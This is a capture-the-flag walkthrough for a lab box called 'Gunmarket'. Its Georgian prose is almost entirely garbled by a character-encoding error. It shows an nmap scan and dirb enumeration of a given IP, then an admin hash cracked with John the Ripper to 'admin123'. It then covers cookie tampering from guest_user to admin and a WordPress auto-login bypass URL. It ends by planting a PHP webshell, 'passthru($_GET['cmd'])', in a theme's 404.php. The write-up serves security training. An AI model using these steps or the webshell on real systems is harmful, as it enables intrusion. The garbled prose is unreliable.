I"Λ?<h1 id="kali-linux">KALİ LİNUX KOMUTLAR PARAMETRELER VE GENEL BİLGİLER</h1>

<p>αƒ’αƒαƒ›αƒαƒ αƒ―αƒαƒ‘αƒ, αƒ“αƒ¦αƒ”αƒ΅ αƒ’αƒαƒαƒ•αƒαƒ®αƒαƒαƒαƒ• αƒ™αƒαƒ‘αƒ”αƒ  αƒαƒαƒαƒ›αƒαƒαƒαƒ“αƒαƒ΅ αƒ›αƒαƒ αƒαƒ’αƒ αƒ™αƒαƒΆαƒ”αƒ’αƒαƒ αƒαƒαƒ΅ Pentest-αƒαƒ΅ αƒ”αƒ αƒ—-αƒ”αƒ αƒ— αƒ΅αƒαƒ•αƒαƒ αƒ―αƒαƒ¨αƒαƒ΅, Gunmarket-αƒ΅ αƒ“αƒ αƒ•αƒ”αƒªαƒ“αƒ”αƒ‘αƒ, αƒ—αƒαƒ—αƒαƒ”αƒ£αƒαƒ αƒαƒαƒ‘αƒαƒ―αƒβ€¦</p>

<p>αƒ’αƒαƒ›αƒαƒ αƒ―αƒαƒ‘αƒ, αƒ“αƒ¦αƒ”αƒ΅ αƒ’αƒαƒαƒ•αƒαƒ®αƒαƒαƒαƒ• αƒ™αƒαƒ‘αƒ”αƒ  αƒαƒαƒαƒ›αƒαƒαƒαƒ“αƒαƒ΅ αƒ›αƒαƒ αƒαƒ’αƒ αƒ™αƒαƒΆαƒ”αƒ’αƒαƒ αƒαƒαƒ΅ <strong>Pentest</strong>-αƒαƒ΅ αƒ”αƒ αƒ—-αƒ”αƒ αƒ— αƒ΅αƒαƒ•αƒαƒ αƒ―αƒαƒ¨αƒαƒ΅, <strong>Gunmarket</strong>-αƒ΅ αƒ“αƒ αƒ•αƒ”αƒªαƒ“αƒ”αƒ‘αƒ, αƒ—αƒαƒ—αƒαƒ”αƒ£αƒαƒ αƒαƒαƒ‘αƒαƒ―αƒ αƒ“αƒ”αƒΆαƒαƒαƒ£αƒ αƒαƒ“ αƒαƒ•αƒ®αƒ΅αƒαƒ.</p>

<p>αƒ£αƒ™αƒ•αƒ” αƒ’αƒαƒαƒ®αƒαƒαƒ£αƒαƒ αƒ™αƒαƒΆαƒ”αƒ’αƒαƒ αƒαƒ”αƒ‘αƒ αƒ—αƒ£ αƒ’αƒαƒαƒαƒΆαƒ”αƒ αƒ”αƒ΅αƒ”αƒ‘αƒ΅, αƒ¨αƒ”αƒ’αƒαƒ«αƒαƒαƒ αƒ’αƒαƒ”αƒªαƒαƒαƒ—:</p>

<blockquote>
  <p><strong><em>Pcap Analysis</em></strong><em>β€β€”β€</em><a href="https://bit.ly/2M9L7f0"><em>https://bit.ly/2M9L7f0</em></a></p>
</blockquote>

<blockquote>
  <p><strong><em>αƒ αƒ αƒαƒ αƒαƒ΅ Buffer OverflowΒ ?</em></strong><em>-</em> <a href="https://bit.ly/2GZbNLr"><em>https://bit.ly/2GZbNLr</em></a></p>
</blockquote>

<blockquote>
  <p><strong>Log analysisβ€</strong>β€”β€<a href="https://bit.ly/2HntEMc">https://bit.ly/2HntEMc</a></p>
</blockquote>

<p>αƒαƒ¦αƒαƒαƒ¨αƒαƒ£αƒ αƒ“αƒαƒ•αƒαƒαƒ”αƒ‘αƒαƒ¨αƒ αƒ’αƒαƒαƒ•αƒαƒ®αƒαƒαƒαƒ•αƒ— αƒαƒ΅αƒ”αƒ— αƒ—αƒ”αƒ›αƒ”αƒ‘αƒ΅, αƒ αƒαƒ’αƒαƒ αƒ”αƒ‘αƒαƒªαƒαƒ:</p>

<ul>
  <li>αƒαƒαƒ αƒΆαƒ”αƒ‘αƒαƒ΅ αƒ΅αƒ™αƒαƒαƒαƒ αƒ”αƒ‘αƒ</li>
  <li><strong>Salted</strong> αƒαƒαƒ αƒαƒαƒ”αƒ‘αƒαƒ΅ αƒ’αƒαƒΆαƒ”αƒ®αƒ•αƒ <strong>JohnTheRipper</strong> αƒαƒ΅ αƒ΅αƒαƒ¨αƒ£αƒαƒαƒ”αƒ‘αƒαƒ—.</li>
  <li>αƒªαƒ£αƒ“αƒ <a href="https://stackoverflow.com/questions/17769011/how-does-cookie-based-authentication-work"><strong>cookie based authentication</strong></a>- αƒαƒ΅ αƒ›αƒαƒ’αƒαƒαƒαƒ—αƒ΅</li>
  <li>αƒ“αƒαƒ αƒ”αƒ¥αƒΆαƒαƒ αƒαƒ”αƒ‘αƒαƒ΅ αƒ”αƒαƒ£αƒ›αƒ”αƒ αƒαƒªαƒαƒαƒ΅</li>
  <li><strong>WPScan</strong> αƒαƒ΅ αƒ’αƒαƒ›αƒαƒ§αƒ”αƒαƒ”αƒ‘αƒ αƒ“αƒ αƒ›αƒαƒ΅αƒ αƒ“αƒαƒ®αƒ›αƒαƒ αƒ”αƒ‘αƒαƒ— αƒαƒ•αƒΆαƒαƒ αƒαƒ–αƒαƒªαƒαƒαƒ–αƒ” αƒ’αƒ•αƒ”αƒ αƒ“αƒαƒ΅ αƒαƒ•αƒαƒ.</li>
  <li><strong>Webshell</strong></li>
</ul>

<p>αƒ™αƒαƒ‘αƒ”αƒ  αƒαƒαƒαƒ›αƒαƒαƒαƒ“αƒαƒ–αƒ” αƒ’αƒαƒ›αƒαƒ§αƒ”αƒαƒ”αƒ‘αƒ£αƒαƒ αƒ΅αƒαƒ•αƒαƒ αƒ―αƒαƒ¨αƒαƒ”αƒ‘αƒ αƒ¨αƒ”αƒ’αƒαƒ«αƒαƒαƒαƒ— <a href="https://cyber-lab.tech/geo/challenges"><strong>cyber-lab</strong></a>β€β€”β€αƒ–αƒ” αƒαƒ®αƒαƒαƒαƒ—.</p>

<p>αƒ›αƒαƒ¨ αƒαƒ΅αƒ”, αƒαƒ›αƒαƒªαƒαƒαƒαƒ΅ αƒαƒαƒ αƒαƒ‘αƒ αƒ¨αƒ”αƒ›αƒ“αƒ”αƒ’αƒαƒ:</p>

<p><img src="img/1__98M9EnXdlkwxUwRSLLgKKw.png" alt="" /></p>

<p>αƒ›αƒαƒªαƒ”αƒ›αƒ£αƒαƒ αƒ’αƒ•αƒαƒ¥αƒ•αƒ΅ αƒαƒ αƒ αƒ™αƒαƒ—αƒ®αƒ•αƒ, αƒ αƒαƒ›αƒαƒ”αƒ‘αƒαƒª 2 αƒ’αƒαƒ΅αƒαƒ¦αƒ”αƒ‘αƒαƒ΅ αƒαƒαƒ•αƒαƒαƒ΅ αƒ’αƒ•αƒαƒ•αƒαƒαƒ”αƒ‘αƒ΅.</p>

<p>αƒ›αƒαƒ“αƒ αƒ“αƒαƒ•αƒαƒ¬αƒ§αƒαƒ— αƒαƒαƒ αƒ•αƒ”αƒαƒ αƒ’αƒαƒ΅αƒαƒ¦αƒ”αƒ‘αƒαƒ΅ αƒ«αƒ”αƒ‘αƒαƒ.</p>

<blockquote>
  <p><strong>nmap -sC -sV -oA nmap/gunmarket 185.212.254.63</strong></p>
</blockquote>

<ul>
  <li>-<strong>sCβ€β€”</strong>β€αƒ“αƒ”αƒ¤αƒαƒ£αƒαƒΆ αƒ΅αƒ™αƒ αƒαƒαƒΆαƒ”αƒ‘αƒαƒ΅αƒ—αƒ•αƒαƒ΅.</li>
  <li><strong>-sVβ€β€”</strong>β€αƒ•αƒ”αƒ αƒ΅αƒαƒ”αƒ‘αƒαƒ΅ αƒ”αƒαƒ£αƒ›αƒ”αƒ αƒαƒªαƒαƒαƒ΅αƒ—αƒ•αƒαƒ΅.</li>
  <li><strong>-oA nmap/gunmarketβ€β€”</strong>β€αƒαƒ£αƒ—αƒ¤αƒ£αƒ—αƒαƒ΅ αƒ¤αƒαƒαƒαƒ¨αƒ αƒ©αƒαƒ΅αƒαƒ¬αƒ”αƒ αƒαƒ“.</li>
</ul>

<p><img src="img/1__D8XEEFXm7GPsk5nGIRN9HQ.png" alt="" /></p>

<p>αƒ’αƒαƒ•αƒαƒ’αƒ”αƒ— αƒ αƒαƒ› αƒ΅αƒαƒαƒΆαƒ–αƒ” αƒ¦αƒαƒαƒ αƒαƒαƒ αƒΆαƒ <strong>80</strong>, αƒ›αƒαƒ“αƒ αƒ’αƒαƒ•αƒ®αƒ΅αƒαƒαƒ— αƒαƒ΅ αƒ•αƒαƒαƒ®αƒαƒ— αƒ αƒ αƒ’αƒ•αƒαƒ¥αƒ•αƒ΅ αƒ›αƒαƒªαƒ”αƒ›αƒ£αƒαƒ:</p>

<p><img src="img/1__cFO__kHnbs4B5LHQ0HOpFxA.png" alt="" /></p>

<p>αƒ›αƒαƒªαƒ”αƒ›αƒ£αƒαƒαƒ αƒ›αƒ®αƒαƒαƒαƒ“ αƒ›αƒαƒ αƒ™αƒ”αƒΆαƒαƒ΅ αƒ΅αƒ£αƒ αƒαƒ—αƒ, αƒ΅αƒαƒ αƒ΅αƒ¨αƒαƒª αƒ΅αƒαƒαƒαƒΆαƒ”αƒ αƒ”αƒ΅αƒ αƒαƒ αƒαƒ¤αƒ”αƒ αƒαƒ:</p>

<p><img src="img/1____WoLo8SKda6rP1cWOu6uGg.png" alt="" /></p>

<h3 id="αƒ’αƒαƒ“αƒαƒ•αƒαƒ“αƒ”αƒ—-αƒ“αƒαƒ αƒ”αƒ¥αƒΆαƒαƒ αƒαƒ”αƒ‘αƒαƒ΅-αƒ”αƒαƒ£αƒ›αƒαƒ αƒαƒªαƒαƒαƒ–αƒ”">αƒ’αƒαƒ“αƒαƒ•αƒαƒ“αƒ”αƒ— αƒ“αƒαƒ αƒ”αƒ¥αƒΆαƒαƒ αƒαƒ”αƒ‘αƒαƒ΅ αƒ”αƒαƒ£αƒ›αƒαƒ αƒαƒªαƒαƒαƒ–αƒ”</h3>

<p>αƒ”αƒαƒ£αƒ›αƒαƒ αƒαƒªαƒαƒαƒ΅αƒ—αƒ•αƒαƒ΅ αƒ’αƒαƒ›αƒαƒ•αƒαƒ§αƒ”αƒαƒαƒ— dirb-αƒ</p>

<blockquote>
  <p><strong>dirb</strong> <a href="http://185.212.254.63">http://185.212.254.63</a></p>
</blockquote>

<blockquote>
  <p><strong>P.S.</strong> Ip αƒ—αƒ¥αƒ•αƒ”αƒ αƒ¨αƒ”αƒ›αƒ—αƒ®αƒ•αƒ”αƒ•αƒαƒ¨αƒ αƒ΅αƒαƒ•αƒαƒ αƒαƒ£αƒ“αƒαƒ— αƒ΅αƒ®αƒ•αƒ αƒαƒ¥αƒαƒ”αƒ‘αƒ.</p>
</blockquote>

<p><strong>dirb</strong>-αƒ›αƒ αƒ αƒαƒ›αƒ“αƒ”αƒαƒαƒ›αƒ” αƒ΅αƒαƒαƒαƒΆαƒ”αƒ αƒ”αƒ΅αƒ αƒ αƒαƒ› αƒαƒαƒαƒ•αƒ, αƒαƒαƒ αƒ•αƒ”αƒαƒβ€β€”β€αƒ”αƒ΅ αƒαƒ αƒαƒ΅ αƒ¤αƒαƒαƒ“αƒ”αƒ αƒ <strong>/wp</strong>, αƒ®αƒαƒαƒ αƒ›αƒ”αƒαƒ αƒ” <strong>/.bash_history</strong> αƒ¤αƒαƒαƒαƒ, αƒ αƒαƒ›αƒ”αƒαƒ›αƒαƒª αƒ΅αƒαƒ•αƒαƒ αƒαƒ£αƒ“αƒαƒ— αƒ΅αƒαƒαƒαƒΆαƒ”αƒ αƒ”αƒ΅αƒ αƒαƒαƒ¤αƒαƒ αƒ›αƒαƒªαƒαƒ αƒ£αƒαƒ“αƒ αƒ›αƒαƒ’αƒ•αƒªαƒ”αƒ›αƒ΅.</p>

<p><img src="img/1__keU__QrpsgywBP3cAsHGzVQ.png" alt="" /></p>

<p>/<strong>wp</strong> αƒ“αƒαƒ αƒ¥αƒΆαƒαƒ αƒαƒαƒ–αƒ” αƒ¬αƒ•αƒ“αƒαƒ›αƒ αƒαƒ  αƒ’αƒ•αƒαƒ¥αƒ•αƒ΅:</p>

<p><img src="img/1__exsoqwaUciNUT5__Z53Itjw.png" alt="" /></p>

<p>αƒ®αƒαƒαƒ <strong>/.bash_history</strong>β€β€”β€αƒαƒ΅ αƒαƒαƒ®αƒ•αƒ αƒ—αƒαƒ•αƒαƒ΅αƒ£αƒ¤αƒαƒαƒ“ αƒ¨αƒ”αƒ’αƒ•αƒαƒ«αƒαƒαƒ.</p>

<p><img src="img/1__Q__fQ__CG8LjgKDjtkTggqHw.png" alt="" /></p>

<p>αƒ›αƒαƒ΅αƒ¨αƒ αƒ©αƒαƒ®αƒ”αƒ“αƒ•αƒαƒ΅αƒαƒ΅ αƒ΅αƒαƒαƒαƒΆαƒ”αƒ αƒ”αƒ΅αƒ αƒαƒαƒ¤αƒαƒ αƒ›αƒαƒªαƒαƒαƒ΅ αƒ•αƒ’αƒ”αƒ‘αƒ£αƒαƒαƒ‘αƒ—:</p>

<ul>
  <li>αƒ“αƒαƒ αƒ”αƒ¥αƒΆαƒαƒ αƒαƒ <strong>/ctf/admin</strong></li>
  <li>αƒαƒ“αƒ›αƒαƒαƒαƒ΅ αƒαƒ£αƒ–αƒ”αƒ αƒαƒ”αƒαƒ›αƒ αƒ“αƒ αƒαƒαƒ αƒαƒαƒ(αƒ°αƒ”αƒ¨αƒαƒ αƒ”αƒ‘αƒ£αƒαƒ).</li>
</ul>

<p><img src="img/1__ev366r__IXUb1nz5McPGsQQ.png" alt="" /></p>

<p><strong>/ctf/admin</strong> αƒ“αƒαƒ αƒ”αƒ¥αƒΆαƒαƒ αƒαƒαƒ–αƒ” αƒ’αƒαƒ“αƒαƒ΅αƒ•αƒαƒαƒ΅αƒαƒ΅ αƒ’αƒ•αƒ—αƒ®αƒαƒ•αƒ΅ αƒαƒ£αƒ–αƒ”αƒ αƒαƒ”αƒαƒ›αƒ΅αƒ αƒ“αƒ αƒαƒαƒ αƒαƒαƒ΅.</p>

<p><img src="img/1__GDZsO__z9VWARVAzNT2roRA.png" alt="" /></p>

<p>αƒαƒ£αƒ–αƒ”αƒ αƒαƒ”αƒαƒ›αƒ αƒ£αƒ™αƒ•αƒ” αƒ•αƒαƒªαƒαƒ—, αƒ αƒαƒ› <strong>admin</strong>-αƒαƒ, αƒαƒαƒ αƒαƒαƒαƒ΅ αƒ’αƒαƒ΅αƒαƒ’αƒ”αƒ‘αƒαƒ“ αƒ™αƒ <strong>JohnTheRipper</strong>-αƒ αƒ’αƒαƒ›αƒαƒ•αƒαƒ§αƒ”αƒαƒαƒ—.</p>

<p>αƒαƒαƒ αƒαƒαƒαƒ΅ αƒ’αƒαƒ΅αƒαƒΆαƒ”αƒ®αƒαƒ“ <strong>john</strong>-αƒ—αƒαƒ αƒ”αƒ αƒ—αƒαƒ“ αƒ“αƒαƒ’αƒ•αƒ­αƒαƒ αƒ“αƒ”αƒ‘αƒ αƒ•αƒαƒ αƒ“αƒαƒαƒ΅αƒΆαƒ, αƒαƒ› αƒ¨αƒ”αƒ›αƒ—αƒ®αƒ•αƒ”αƒ•αƒαƒ¨αƒ αƒ’αƒαƒ›αƒαƒ•αƒαƒ§αƒ”αƒαƒ”αƒ‘ <strong>rockyou</strong>-αƒαƒ΅, αƒ αƒαƒ›αƒαƒαƒ΅ αƒ©αƒαƒ¬αƒ”αƒ αƒαƒª αƒαƒ¦αƒαƒαƒ¨αƒαƒ£αƒαƒ αƒαƒαƒαƒ™αƒαƒ“αƒαƒ αƒ¨αƒ”αƒ’αƒαƒ«αƒαƒαƒαƒ—β€β€”β€<a href="https://github.com/brannondorsey/naive-hashcat/releases/tag/data"><strong>rockyou</strong></a><strong>.</strong></p>

<h3 id="αƒ’αƒαƒ•αƒΆαƒ”αƒ®αƒαƒ—-αƒαƒαƒ αƒαƒαƒ">αƒ’αƒαƒ•αƒΆαƒ”αƒ®αƒαƒ— αƒαƒαƒ αƒαƒαƒ</h3>

<blockquote>
  <p>αƒ αƒαƒαƒ›αƒ” αƒ¤αƒαƒαƒαƒ¨αƒ αƒ©αƒαƒ¬αƒ”αƒ αƒ”αƒ— αƒαƒαƒ αƒαƒαƒαƒ΅ αƒ°αƒ”αƒ¨αƒ, αƒ©αƒ”αƒ› αƒ¨αƒ”αƒ›αƒ—αƒ®αƒ•αƒ”αƒ•αƒαƒ¨αƒ <strong>gunmarket_pass</strong>β€β€”β€αƒ¨αƒ αƒ›αƒαƒ•αƒαƒ—αƒαƒ•αƒ΅αƒ” αƒαƒ΅.</p>
</blockquote>

<p><img src="img/1__gP__YxbiWgF0bddVyFIHRmw.png" alt="**echo β€admin:$apr1$T9QLutEh$9Y192r5I3TI52/bsdksIy.β€™ &gt; gunmarket_pass**" />
<strong>echo β€admin:$apr1$T9QLutEh$9Y192r5I3TI52/bsdksIy.β€™ &gt; gunmarket_pass</strong></p>

<blockquote>
  <p><strong>johnβ€β€”β€wordlist=rockyou.txt gunmarket_pass</strong></p>
</blockquote>

<blockquote>
  <p>αƒ΅αƒαƒ“αƒαƒª <strong>rockyou.txt</strong> αƒ—αƒ¥αƒ•αƒ”αƒαƒ αƒαƒαƒ αƒαƒαƒ”αƒ‘αƒαƒ΅ αƒ΅αƒαƒαƒ΅ αƒ›αƒαƒ΅αƒαƒ›αƒαƒ αƒ—αƒαƒ, αƒ®αƒαƒαƒ <strong>gunmarket_pass</strong>- αƒαƒ› αƒ¤αƒαƒαƒαƒαƒ΅ αƒ›αƒαƒ΅αƒαƒ›αƒαƒ αƒ—αƒ αƒ΅αƒαƒ“αƒαƒª αƒαƒαƒ αƒαƒαƒαƒ΅ αƒ°αƒ”αƒ¨αƒαƒ αƒ›αƒαƒ—αƒαƒ•αƒ΅αƒ”αƒ‘αƒ£αƒαƒ.</p>
</blockquote>

<p><img src="img/1__mX9qct54dYqsjj7T50JYvQ.png" alt="" /></p>

<p>αƒ’αƒαƒ•αƒαƒ’αƒ”αƒ— αƒαƒ“αƒ›αƒαƒαƒαƒ΅ αƒαƒαƒ αƒαƒαƒαƒªβ€β€”β€<strong>admin123.</strong></p>

<p>αƒ¨αƒ”αƒ’αƒ•αƒαƒ«αƒαƒαƒ αƒ“αƒαƒ•αƒ£αƒ‘αƒ αƒ£αƒαƒ“αƒ”αƒ— <strong>/ctf/admin/</strong> αƒ“αƒαƒ αƒ”αƒ¥αƒΆαƒαƒ αƒαƒαƒ΅, αƒ΅αƒαƒ“αƒαƒª <strong>Cookie Monster</strong>-αƒαƒ΅ αƒ¤αƒαƒΆαƒ αƒ’αƒ•αƒ®αƒ“αƒ”αƒ‘αƒ.</p>

<p><img src="img/1__xtZO4G5iYEfJnLWd8z__MMw.png" alt="" /></p>

<p>αƒ°αƒαƒαƒ—αƒ αƒ£αƒ™αƒ•αƒ” αƒ’αƒαƒ΅αƒαƒ’αƒ”αƒ‘αƒαƒ, αƒ“αƒ αƒαƒ αƒ¥αƒ£αƒ¥αƒ”αƒ‘αƒ΅ αƒ©αƒαƒ•αƒ®αƒ”αƒ“αƒαƒ—:</p>

<p>αƒ¥αƒ£αƒ¥αƒ”αƒ‘αƒ¨αƒ αƒ”αƒ αƒ—αƒ αƒ•αƒ”αƒαƒ αƒ’αƒ•αƒαƒ¥αƒ•αƒ΅ αƒ›αƒαƒªαƒ”αƒ›αƒ£αƒαƒ, αƒ΅αƒαƒ®αƒ”αƒαƒαƒ“ <strong>username</strong> αƒ®αƒαƒαƒ αƒ›αƒαƒ΅αƒ αƒ›αƒαƒαƒ¨αƒ•αƒαƒ”αƒαƒαƒ‘αƒ, αƒ©αƒ•αƒ”αƒ αƒ¨αƒ”αƒ›αƒ—αƒ®αƒ•αƒ”αƒ•αƒαƒ¨αƒ <strong>guest_user</strong>-αƒαƒ.</p>

<p><img src="img/1__MMB37uiQ9BzamhHU8janqA.png" alt="" /></p>

<p>αƒ›αƒαƒ“αƒ αƒ¨αƒ”αƒ•αƒªαƒ•αƒαƒαƒαƒ— <strong>guest_user</strong>β€β€”β€<strong>admin</strong>-αƒαƒ— αƒ“αƒ αƒ•αƒαƒαƒ®αƒαƒ— αƒ αƒαƒ›αƒαƒ®αƒ“αƒ”αƒ‘αƒ:</p>

<p><img src="img/1__UkHCi9dhA8kIELDjGjQtUw.png" alt="" /></p>

<p>αƒ›αƒαƒ•αƒαƒ¦αƒ”αƒ— αƒαƒαƒ αƒ•αƒ”αƒαƒ αƒ’αƒαƒ΅αƒαƒ¦αƒ”αƒ‘αƒ αƒ“αƒ αƒ°αƒαƒαƒ—αƒ αƒ›αƒ”αƒαƒ αƒ” αƒ’αƒαƒ΅αƒαƒ¦αƒ”αƒ‘αƒαƒ΅ αƒ΅αƒαƒ«αƒαƒ”αƒ‘αƒαƒαƒ“.</p>

<p><strong>/wp/wordpress</strong>-αƒ–αƒ” αƒ’αƒ•αƒ®αƒ“αƒ”αƒ‘αƒ αƒ•αƒαƒ αƒ“αƒαƒ αƒ”αƒ΅αƒαƒ΅ αƒ΅αƒαƒαƒΆαƒ, αƒ αƒαƒ›αƒ”αƒαƒ–αƒ”αƒª αƒαƒ αƒαƒ¤αƒ”αƒ αƒ αƒαƒ  αƒαƒ αƒαƒ΅ αƒ’αƒαƒαƒ—αƒαƒ•αƒ΅αƒ”αƒ‘αƒ£αƒαƒ, αƒαƒ  αƒ’αƒ•αƒαƒ«αƒαƒ”αƒ•αƒ΅ αƒαƒ αƒαƒαƒαƒαƒ  αƒ›αƒαƒαƒαƒ¨αƒαƒ”αƒ‘αƒαƒ΅.</p>

<p><img src="img/1____n1Zj1UarphnN6Mtkx9rwA.png" alt="" /></p>

<p>αƒ›αƒαƒ“αƒ αƒ•αƒªαƒαƒ“αƒαƒ— <strong>WPScan</strong> αƒ“αƒ αƒ•αƒαƒαƒ®αƒαƒ— αƒ›αƒαƒ’αƒ•αƒªαƒ”αƒ›αƒ΅ αƒ—αƒ£ αƒαƒ αƒ αƒ αƒαƒαƒ›αƒ” αƒ¨αƒ”αƒ“αƒ”αƒ’αƒ΅.</p>

<blockquote>
  <p><strong>WPScan</strong> αƒαƒ αƒαƒ΅ αƒ®αƒ”αƒαƒ΅αƒαƒ¬αƒ§αƒ <strong>Wordpress</strong> αƒαƒ΅ αƒ΅αƒαƒαƒΆαƒ”αƒ‘αƒαƒ΅ αƒ›αƒαƒ¬αƒ§αƒ•αƒαƒαƒ“αƒαƒ‘αƒ”αƒ‘αƒαƒ΅ αƒ΅αƒαƒ«αƒαƒ”αƒ‘αƒαƒαƒ“.</p>
</blockquote>

<p><strong>WPScan</strong>-αƒ›αƒ αƒαƒ—αƒ®αƒ αƒ΅αƒαƒαƒαƒΆαƒ”αƒ αƒ”αƒ΅αƒ αƒ›αƒαƒ¬αƒ§αƒ•αƒαƒαƒ“αƒαƒ‘αƒ αƒαƒαƒαƒ•αƒ, αƒαƒαƒ αƒ•αƒ”αƒαƒαƒ΅ αƒ΅αƒαƒ¨αƒ£αƒαƒαƒ”αƒ‘αƒαƒ—, αƒ αƒαƒ’αƒαƒ αƒª αƒαƒ΅ αƒ’αƒ•αƒ”αƒ£αƒ‘αƒαƒ”αƒ‘αƒ αƒ¨αƒ”αƒ’αƒ•αƒαƒ«αƒαƒαƒ αƒαƒ•αƒΆαƒαƒ αƒαƒ–αƒαƒªαƒαƒαƒ–αƒ” αƒ’αƒ•αƒ”αƒ αƒ“αƒαƒ΅ αƒαƒ•αƒαƒ.</p>

<p>αƒ›αƒαƒ“αƒ αƒ•αƒªαƒαƒ“αƒαƒ— αƒ›αƒαƒ΅αƒ αƒ’αƒαƒ›αƒαƒ§αƒ”αƒαƒ”αƒ‘αƒ.</p>

<p><img src="img/1__safXuxmrNmqE5iw6boqwbA.png" alt="" /></p>

<p>αƒ αƒαƒ’αƒαƒ αƒª <a href="https://www.exploit-db.com/exploits/43117"><strong>exploit-db</strong></a> αƒ“αƒαƒ αƒ•αƒ’αƒ”αƒ‘αƒ£αƒαƒαƒ‘αƒ—, αƒ—αƒ£ αƒ΅αƒαƒαƒΆαƒ–αƒ” αƒ“αƒ”αƒ¤αƒαƒ£αƒαƒΆ αƒαƒ£αƒ–αƒ”αƒ αƒ <strong>admin</strong>-αƒ αƒ’αƒ•αƒ§αƒαƒ•αƒ΅, αƒ¨αƒ”αƒ’αƒ•αƒαƒ«αƒαƒαƒ αƒ›αƒαƒ΅αƒ αƒαƒαƒ’αƒαƒ αƒαƒ¨αƒαƒ΅ αƒ’αƒαƒ›αƒαƒ§αƒ”αƒαƒ”αƒ‘αƒ, αƒ“αƒ αƒ΅αƒαƒαƒΆαƒ–αƒ” αƒαƒ•αƒΆαƒαƒ αƒαƒ–αƒαƒªαƒαƒαƒ΅ αƒ’αƒαƒ αƒ”αƒ¨αƒ” αƒ¨αƒ”αƒ΅αƒ•αƒαƒ αƒαƒαƒαƒ™αƒ¨αƒβ€β€”β€<code class="highlighter-rouge">**?up_auto_log=true**</code>β€β€”β€αƒαƒ΅ αƒ›αƒαƒ›αƒαƒΆαƒ”αƒ‘αƒαƒ—.</p>

<p><img src="img/1__OdGW0UoBe3h0VlCDW46vig.png" alt="" /></p>

<p>αƒ’αƒαƒ“αƒαƒ•αƒαƒ“αƒ”αƒ— αƒαƒαƒαƒ™αƒ–αƒ”β€β€”<a href="http://185.212.254.63/wp/wordpress/?up_auto_log=true"><strong>http://185.212.254.63/wp/wordpress/?up_auto_log=true</strong></a></p>

<p>αƒαƒ›αƒ£αƒ¨αƒαƒ•αƒ αƒαƒ¦αƒαƒαƒ¨αƒαƒ£αƒαƒ›αƒ αƒ”αƒ¥αƒ΅αƒαƒαƒαƒαƒΆαƒ›αƒ, αƒ΅αƒαƒαƒΆαƒαƒ΅ αƒ΅αƒαƒ›αƒαƒ αƒ—αƒαƒ• αƒαƒαƒαƒ”αƒαƒ–αƒ” αƒ¬αƒ•αƒ“αƒαƒ›αƒ αƒ›αƒαƒ•αƒαƒαƒαƒ•αƒ”αƒ—.</p>

<p><img src="img/1__Ng9Ry__Mo8CIYlfr43erpRg.png" alt="" /></p>

<p>αƒ΅αƒαƒαƒΆαƒ–αƒ” αƒ¬αƒ•αƒ“αƒαƒ›αƒ αƒ’αƒ•αƒαƒ¥αƒ•αƒ΅, αƒ¨αƒ”αƒ›αƒ“αƒ”αƒ’αƒ αƒαƒαƒ‘αƒαƒ―αƒαƒ αƒ΅αƒαƒ΅αƒΆαƒ”αƒ›αƒαƒ–αƒ” αƒ¬αƒ•αƒ“αƒαƒ›αƒαƒ΅ αƒ›αƒαƒαƒαƒ•αƒ”αƒ‘αƒ.</p>

<p>αƒαƒ›αƒαƒ΅αƒ—αƒ•αƒαƒ΅ αƒ’αƒαƒ›αƒαƒ•αƒαƒ§αƒ”αƒαƒ”αƒ‘ <strong>webshell</strong>-αƒ΅.</p>

<p>αƒ£αƒαƒ›αƒ αƒαƒ• αƒαƒ“αƒ’αƒαƒαƒαƒ΅ αƒ¨αƒ”αƒ’αƒ•αƒαƒ«αƒαƒαƒ αƒ¨αƒ”αƒαƒαƒ΅ αƒ’αƒαƒαƒ—αƒαƒ•αƒ΅αƒ”αƒ‘αƒ, αƒ›αƒ” αƒαƒ¥αƒΆαƒαƒ£αƒ αƒ αƒ—αƒ”αƒ›αƒαƒ΅ <strong>404.php</strong> αƒαƒ•αƒαƒ αƒ©αƒαƒ”.</p>

<p>αƒ αƒαƒ›αƒαƒαƒ΅ αƒαƒαƒ®αƒ•αƒαƒ΅αƒ—αƒ•αƒαƒ΅αƒαƒª αƒ£αƒαƒ“αƒ αƒ¨αƒ”αƒ®αƒ•αƒαƒ“αƒ”αƒ— <strong>Appearance</strong> αƒ¨αƒ”αƒ›αƒ“αƒ”αƒ’ αƒ™αƒ <strong>editor-</strong>αƒ¨αƒ.</p>

<p>αƒ΅αƒαƒ¥αƒ›αƒ” αƒ™αƒαƒ“αƒ”αƒ• αƒ£αƒ¤αƒ αƒ αƒ’αƒαƒ›αƒαƒ αƒΆαƒαƒ•αƒ”αƒ‘αƒ£αƒαƒ αƒ“αƒαƒ’αƒ®αƒ•αƒ“αƒ, <strong>webshell</strong> αƒ™αƒαƒ“αƒ αƒ£αƒ™αƒ•αƒ” αƒ’αƒαƒαƒ—αƒαƒ•αƒ΅αƒ”αƒ‘αƒ£αƒαƒαƒ <strong>404.php</strong> αƒ¨αƒ.</p>

<p>αƒ αƒαƒ›αƒαƒαƒ΅ αƒαƒ  αƒαƒ αƒ΅αƒ”αƒ‘αƒαƒ‘αƒαƒ΅ αƒ¨αƒ”αƒ›αƒ—αƒ®αƒ•αƒ”αƒ•αƒαƒ¨αƒαƒª, αƒ£αƒ‘αƒ αƒαƒαƒαƒ“ αƒ“αƒαƒ•αƒαƒ›αƒαƒΆαƒ”αƒ‘αƒ“αƒαƒ— <strong>webshell</strong> αƒ™αƒαƒ“αƒ΅ αƒ“αƒ αƒ¨αƒ”αƒ•αƒαƒαƒαƒ®αƒαƒ•αƒ“αƒαƒ— αƒ¤αƒαƒαƒαƒ΅.</p>

<blockquote>
  <p>echo passthru($_GET[β€cmdβ€™]);</p>
</blockquote>

<p><img src="img/1__1eVTnG__PJvQloVAh__e7ebQ.png" alt="" /></p>

